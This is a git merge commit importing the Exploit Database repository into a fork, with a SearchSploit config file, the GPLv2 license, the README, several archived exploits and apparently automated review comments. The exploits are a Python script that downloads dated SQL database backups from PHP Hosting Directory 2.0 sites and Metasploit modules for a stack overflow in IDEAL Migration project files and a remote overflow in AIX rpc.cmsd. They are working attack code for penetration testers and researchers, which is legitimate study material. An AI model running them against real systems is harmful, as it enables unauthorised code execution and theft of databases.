Merge remote-tracking branch 'exploitdb/main'

Brendan McDevitt 2025-03-28 18:47:11 +00:00
commit 535b1933b6
47186 changed files with 4007663 additions and 0 deletions

26
.searchsploit_rc Normal file

@ -0,0 +1,26 @@
##-- Program Settings
progname="$( basename "$0" )"
##-- Exploits
files_array+=("files_exploits.csv")
path_array+=("/opt/exploitdb")
name_array+=("Exploit")
git_array+=("https://gitlab.com/exploit-database/exploitdb.git")
package_array+=("exploitdb")
##-- Shellcodes
files_array+=("files_shellcodes.csv")
path_array+=("/opt/exploitdb")
name_array+=("Shellcode")
git_array+=("https://gitlab.com/exploit-database/exploitdb.git")
package_array+=("exploitdb")
##-- Papers
files_array+=("files_papers.csv")
path_array+=("/opt/exploitdb-papers")
name_array+=("Paper")
git_array+=("https://gitlab.com/exploit-database/exploitdb-papers.git")
package_array+=("exploitdb-papers")
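Review bot: this file is sourced as shell rather than parsed as data (`progname="$( basename "$0" )"` and the `files_array+=(...)` / `path_array+=(...)` appends are bash syntax), so anyone who can write it runs commands as the searchsploit user; the commit should document that, and the install steps should keep the file owned by root and not group- or world-writable. A smaller point: the Exploits and Shellcodes entries both point at `/opt/exploitdb` and the same git URL, which is intended because both CSVs live in one clone, but a one-line comment saying so would stop the next reader from "fixing" it.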

339
LICENSE.md Normal file

@ -0,0 +1,339 @@
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) year name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
<signature of Ty Coon>, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License.

174
README.md Normal file

@ -0,0 +1,174 @@
# The Exploit Database Git Repository
This is an official repository of [The Exploit Database](https://www.exploit-db.com/), a [project](https://www.offensive-security.com/community-projects/) sponsored by [Offensive Security](https://www.offensive-security.com/).
Our repositories are:
- Exploits & Shellcodes: [gitlab.com/exploit-database/exploitdb](https://gitlab.com/exploit-database/exploitdb)
- Binary Exploits: [gitlab.com/exploit-database/exploitdb-bin-sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits)
- Papers: [gitlab.com/exploit-database/exploitdb-papers](https://gitlab.com/exploit-database/exploitdb-papers)
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/), [shellcode](https://www.exploit-db.com/shellcodes) and [papers](https://www.exploit-db.com/papers) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
You can learn more about the project [here (Top Right -> About Exploit-DB)](https://www.exploit-db.com/) and [here (History)](https://www.exploit-db.com/history).
This repository is updated daily with the most recently added submissions. Any additional resources can be found in our [binary exploits repository](https://gitlab.com/exploit-database/exploitdb-bin-sploits).
Exploits are located in the [`/exploits/`](https://gitlab.com/exploit-database/exploitdb/tree/main/exploits) directory, shellcodes can be found in the [`/shellcodes/`](https://gitlab.com/exploit-database/exploitdb/tree/main/shellcodes) directory.
- - -
## License
This project (and SearchSploit) is released under "[GNU General Public License v2.0](https://gitlab.com/exploit-database/exploitdb/-/blob/main/LICENSE.md)".
- - -
# SearchSploit
Included with this repository is the **SearchSploit** utility, which will allow you to search through exploits, shellcodes and papers _(if installed)_ using one or more terms.
For more information, please see the **[SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
## Usage/Example
```
kali@kali:~$ searchsploit -h
Usage: searchsploit [options] term1 [term2] ... [termN]
==========
Examples
==========
searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit -s Apache Struts 2.0.0
searchsploit linux reverse password
searchsploit -j 55555 | jq
searchsploit --cve 2021-44228
For more examples, see the manual: https://www.exploit-db.com/searchsploit
=========
Options
=========
## Search Terms
-c, --case [term] Perform a case-sensitive search (Default is inSEnsITiVe)
-e, --exact [term] Perform an EXACT & order match on exploit title (Default is an AND match on each term) [Implies "-t"]
e.g. "WordPress 4.1" would not be detect "WordPress Core 4.1")
-s, --strict Perform a strict search, so input values must exist, disabling fuzzy search for version range
e.g. "1.1" would not be detected in "1.0 < 1.3")
-t, --title [term] Search JUST the exploit title (Default is title AND the file's path)
--exclude="term" Remove values from results. By using "|" to separate, you can chain multiple values
e.g. --exclude="term1|term2|term3"
--cve [CVE] Search for Common Vulnerabilities and Exposures (CVE) value
## Output
-j, --json [term] Show result in JSON format
-o, --overflow [term] Exploit titles are allowed to overflow their columns
-p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible)
-v, --verbose Display more information in output
-w, --www [term] Show URLs to Exploit-DB.com rather than the local path
--id Display the EDB-ID value rather than local path
--disable-colour Disable colour highlighting in search results
## Non-Searching
-m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory
-x, --examine [EDB-ID] Examine (aka opens) the exploit using $PAGER
## Non-Searching
-h, --help Show this help screen
-u, --update Check for and install any exploitdb package updates (brew, deb & git)
## Automation
--nmap [file.xml] Checks all results in Nmap's XML output with service version
e.g.: nmap [host] -sV -oX file.xml
=======
Notes
=======
* You can use any number of search terms
* By default, search terms are not case-sensitive, ordering is irrelevant, and will search between version ranges
* Use '-c' if you wish to reduce results by case-sensitive searching
* And/Or '-e' if you wish to filter results by using an exact match
* And/Or '-s' if you wish to look for an exact version match
* Use '-t' to exclude the file's path to filter the search results
* Remove false positives (especially when searching using numbers - i.e. versions)
* When using '--nmap', adding '-v' (verbose), it will search for even more combinations
* When updating or displaying help, search terms will be ignored
kali@kali:~$
kali@kali:~$ searchsploit afd windows local
---------------------------------------------------------------------------------------- -----------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------- -----------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) | windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046) | windows/dos/18755.c
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit) | windows/local/21844.rb
Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) | windows_x86-64/local/39525.py
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) | windows_x86/local/39446.py
Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service | windows/dos/17133.c
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066) | windows/local/6757.txt
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080) | windows/local/18176.py
---------------------------------------------------------------------------------------- -----------------------------------
Shellcodes: No Result
kali@kali:~$
kali@kali:~$ searchsploit -p 39446
Exploit: Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
URL: https://www.exploit-db.com/exploits/39446
Path: /Users/b/Projects/git/forks/exploitdb/exploits/windows_x86/local/39446.py
Codes: N/A
Verified: False
File Type: Python script text executable, ASCII text
Copied EDB-ID #39446's path to the clipboard
kali@kali:~$
```
- - -
## Install
SearchSploit requires either "CoreUtils" or "utilities" (e.g. `bash`, `sed`, `grep`, `awk`, etc.) for the core features to work.
The self updating function will require `git`, and for the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
You can find a **more in-depth guide in the [SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
**Kali Linux**
Exploit-DB/SearchSploit is already packaged inside of Kali-Linux. A method of installation is:
```
kali@kali:~$ sudo apt -y install exploitdb
```
_NOTE, Optional is to install the additional packages:_
```
kali@kali:~$ sudo apt -y install exploitdb-bin-sploits exploitdb-papers
```
**Git**
In short, clone the repository, add the binary into `$PATH`, and edit the config file to reflect the git path:
```
$ sudo git clone https://gitlab.com/exploit-database/exploitdb.git /opt/exploitdb
$ sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
```
**Homebrew**
If you have [homebrew](http://brew.sh/) ([package](https://github.com/Homebrew/homebrew-core/blob/master/Formula/exploitdb.rb), [formula](https://formulae.brew.sh/formula/exploitdb)) installed, running the following will get you set up:
```
user@MacBook:~$ brew update && brew install exploitdb
```
- - -
## Credit
The following people made this possible:
- [Offensive Security](https://www.offensive-security.com/)
- [@Unix-Ninja](https://github.com/unix-ninja)
- [@g0tmi1k](https://blog.g0tmi1k.com/)
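Review bot: the Git install section says to "edit the config file to reflect the git path" but never names the file or shows the edit; name `.searchsploit_rc` and its `path_array` entries so the clone location and the config agree, which matters because the default search includes the file's path unless `-t` is given. Two documentation points in the captured help text: the `## Non-Searching` heading appears twice (once over `-m`/`-x`, once over `-h`/`-u`), and the `searchsploit -p 39446` example prints `/Users/b/Projects/git/forks/exploitdb/...` while the prompt reads `kali@kali`, so the sample output came from a different machine than the prompt suggests; regenerate it from the documented `/opt/exploitdb` layout.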

197
exploits/aix/dos/15264.py Executable file

@ -0,0 +1,197 @@
#!/usr/bin/env python
#-*- coding:cp1254 -*-
'''
# Title : PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Down. Script : -
# Proof : http://img214.imageshack.us/img214/2407/directory.jpg
# Tested : Windows XP Professional sp3
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 16/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : off ulan off / http://www.youtube.com/watch?v=mIdwAz7-cHk
'''
import sys, urllib2, re, os, time
def indiriyoruz(url):
import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()
if len(sys.argv) < 3:
import os
os.system(['clear','cls'][1])
os.system('color 2')
print "_______________________________________________________________"
print " "
print " PHP Hosting Directory 2.0 Database Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print " "
print " example day-mounth-year for today: "
print " "
print " today: 16-10-2010 "
print " "
print "_______________________________________________________________"
sys.exit("\nexample: http://www.server.com/ 16-10-2010")
''' link kontrol 1 '''
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
db = "admin/backup/db/backup_db_"
tarih = sys.argv[2]
uzanti = ".sql.gz"
url2 = sitemiz + db + tarih + uzanti
''' link kontrol 2 '''
try:
adreskontrol = urllib2.urlopen(url2).read()
if len(adreskontrol) > 0:
print "\nGood Job Bro!"
except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)
''' dosya indiriliyor '''
if __name__ == '__main__':
import sys
if len(sys.argv) == 3:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'
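Review bot: the file's location does not match its content: `exploits/aix/dos/15264.py` holds a "PHP Hosting Directory 2.0 Database Disclosure" script whose header says it was tested on Windows XP Professional SP3, not an AIX denial of service, so the platform/type metadata in `files_exploits.csv` should be checked before this lands; otherwise path-based searches for `aix` or `dos` will return it and `--nmap` service matching will be wrong for it. Independently, the script is Python 2 only (`print` statements, `urllib2`, the `cp1254` coding cookie) under a bare `#!/usr/bin/env python` shebang, and `os.system(['clear','cls'][1])` always runs `cls` followed by `color 2`, so the usage banner fails on any non-Windows host; record it as Python 2/Windows in the archive metadata rather than editing archived content.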

107
exploits/aix/dos/16657.rb Executable file

@ -0,0 +1,107 @@
##
# $Id: ideal_migration_ipj.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'PointDev IDEAL Migration Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions v9.7
through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
IDEAL Migration. All versions are suspected to be vulnerable.
By creating a specially crafted ipj file, an an attacker may be able
to execute arbitrary code.
NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
},
'License' => MSF_LICENSE,
'Author' => [ 'Dr_IDE', 'dookie', 'jduck' ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-4265' ],
[ 'OSVDB', '60681' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12403' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12404' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12540' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x1a\x22\x3c\x3e",
'StackAdjustment' => -3500,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'IDEAL Migration <= 4.5.1 on Windows XP',
{
'Ret' => 0x1001411e # CALL EBP in ULMigration_us.dll
# 'Ret' => 0x7c96bf33 # JMP ESP in ULMigration_us.dll (from Blake)
# 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
}
],
[ 'IDEAL Administration <= 10.5 on Windows XP',
{
'Ret' => 0x10010F2E # CALL EBP in ListWmi.dll
# 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Dec 05 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.ipj']),
], self.class)
end
def exploit
ipj = "\r\n"
ipj << "[Group,Export,Yes]\r\n"
ipj << "Computer="
sploit = ""
sploit << rand_text_alpha_upper(2420)
sploit << [target.ret].pack('V')
# These nops are required to move the payload below where ebp points
# when returning...
sploit << make_nops(768)
sploit << payload.encoded
ipj << sploit
ipj << "\r\n"
ipj << "[End]\r\n"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(ipj)
end
end
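Review bot: the Description block reads "an an attacker may be able to execute arbitrary code"; drop the duplicated article. The commented-out alternative 'Ret' values in both targets cite "JMP ESP in ?? (from Dr_IDE)" with no DLL or OS named, so nobody can verify them; either document where each came from and on which build it was checked, or remove them so the Targets table is the single source of truth. 'Version' => '$Revision: 10477 $' and the self.class argument to register_options are legacy Framework API, so the module should state which Metasploit revision it was written against rather than leaving readers to infer it from the SVN keyword.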

121
exploits/aix/dos/16929.rb Executable file


@ -0,0 +1,121 @@
##
# $Id: rpc_cmsd_opcode21.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in opcode 21 handled by
rpc.cmsd on AIX. By making a request with a long string passed to the first
argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
leads to arbitrary code execution.
NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
further attempts are not possible.
},
'Author' =>
[
'Rodrigo Rubira Branco (BSDaemon)',
'jduck',
],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-3699' ],
[ 'OSVDB', '58726' ],
[ 'BID', '36615' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ],
[ 'URL', 'http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ]
],
'Platform' => [ 'aix' ],
'Payload' =>
{
'Space' => 4104,
'BadChars' => "\x00",
# The RPC function splits the string by 0x40, watch out!
# It's not a payload badchar since we're putting the payload elsewhere...
'DisableNops' => true
},
'Targets' =>
[
[
'IBM AIX Version 5.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'AIX' => '5.1',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x2022dfc8 },
#worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
'Stop' => { 'Ret' => 0x202302c8 },
'Step' => 600
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 07 2009'))
end
def brute_exploit(brute_target)
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
begin
if (not sunrpc_create('udp', 100068, 4))
raise RuntimeError, 'sunrpc_create failed'
end
# spray the heap a bit (work around powerpc cache issues)
buf = make_nops(1024 - @aixpayload.length)
buf << @aixpayload
xdr = XDR.encode(buf, buf)
10.times {
sunrpc_call(7, xdr, 2)
}
#print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
buf = rand_text_alphanumeric(payload_space)
buf << [brute_target['Ret']].pack('N')
xdr = XDR.encode(buf, "")
sunrpc_authunix('localhost', 0, 0, [])
sunrpc_call(21, xdr, 2)
handler(sunrpc_callsock)
sunrpc_destroy
rescue Rex::Proto::SunRPC::RPCTimeout
# print_error('RPCTimeout')
rescue EOFError
# print_error('EOFError')
end
end
end
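Review bot: both rescue clauses at the end of brute_exploit swallow the exception with their print_error calls commented out, so the log cannot distinguish an RPC timeout from a dropped connection; given the Description's own warning that unsuccessful attempts may leave inetd/portmapper in a state where further attempts are not possible, that condition deserves at least a vprint_error rather than silence. The "#worked on ibmoz" alternative Start address in the Bruteforce stanza is undocumented dead configuration; record what "ibmoz" was (OS level, hardware) or drop it. The leftover '#print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)' debugging line should be removed before the module is considered final.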


@ -0,0 +1,15 @@
source: https://www.securityfocus.com/bid/61/info
There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port
